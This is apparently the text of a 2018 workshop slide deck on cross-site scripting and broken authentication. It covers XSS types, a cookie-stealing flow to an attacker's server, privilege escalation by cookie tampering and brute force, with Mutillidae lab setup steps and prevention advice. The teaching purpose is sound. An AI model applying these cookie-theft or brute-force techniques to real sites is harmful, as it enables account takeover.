Download as PDF, PPTX
More Related Content
Similar to XSS and Broken authentication
XSS and Broken authentication
- 1. Cross-Site Scripting & BrokenAuthentication VodQA Chennai— September 2018 Abinaya V and Agalya D
- 2. ● What isXSS? ● Types of XSS with hands-on ● Cookie stealing ● Prevention of XSS ● Broken Authentication ● Privilege escalation ● Brutal force ● Mitigation of Broken authentication Agenda
- 3. Cross-Site Scripting A7:2017-Cross-Site Scripting(XSS) A3:2013-Cross-Site Scripting (XSS)
- 5. - Client sidecode injection attack - Injecting malicious code into a vulnerable web application What is XSS ?
- 7. - Steal user’scookie for the domain - Scrape or modify the content bypassing Same origin policy - Trojan horse programs could be injected - Gather information from victims browser: account, cookies, other sensitive information Consequences
- 8.
- 9.
- 10. Types of XSS -Reflected (non-persistent) - Stored (persistent) - DOM based XSS
- 11.
- 12.
- 13. SET-UP INSTRUCTIONS: Participants usingthe Mutillidae Docker image: 1. Install docker 2. Install mutillidae app using docker command docker run -d -p 80:80 -p 443:443 --name owasp17 bltsec/mutillidae-docker 3. Open mutillidae App: http://localhost/mutillidae/ First time, it will redirected to http://localhost/mutillidae/database-offline.php 4. Click “setup/reset the DB” to setup database Participants Virtualbox OVA image: 1. Access the app using the url: http://192.168.56.180 /mutillidae/index.php? Change Browser proxy settings: Firefox--> Preferences --> Network proxy --> Settings --> ‘Manual Proxy Configuration’
- 14.
- 15. 1. Injects bad script 3.Receives bad script 2. Request content 4. Steal valuable data Stored XSS
- 16.
- 17.
- 18. Server to receivecookies when the malicious script is run Attacker’s server Malicious Script is run when the vulnerable page loads Victim’s web application
- 19. How to prevent? -Vigilance - Sanitisation or validation of user input - Use HttpOnly flag in the HTTP response header
- 20.
- 22. These types ofweaknesses can allow an attacker to either capture or bypass the authentication methods that are used by a web application. The goal of an attack is to take over one or more accounts . ● User authentication credentials are not protected when stored. ● Predictable login credentials ● Passwords, session IDs, and other credentials are sent over unencrypted connections. ● Application’s timeout is not set properly ● URL rewriting http://site.com/sale;jsessionid=2P9GC2JSNDLPS KHCJUN5TU?dest=Europe
- 23. LinkedIn Data Breach: 50easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach Passwords were stored in SHA1 with no salting Source:LeakedSource
- 24. Privilege escalation viacookie tampering
- 31. Prevention - Implement multi-factorauthentication to prevent automated, credential stuffing, brute force, and stolen credential reuse attacks - Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected. - Do not deploy with any default credentials, particularly for admin users - Implement weak-password checks - Have password rotation policies - Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.
- 32. References - https://www.owasp.org/index.php - https://sourceforge.net/projects/mutillidae/ -https://www.cvedetails.com/about-contact.php - https://github.com/danielmiessler/SecLists/tree/master/Passwords/
- 33.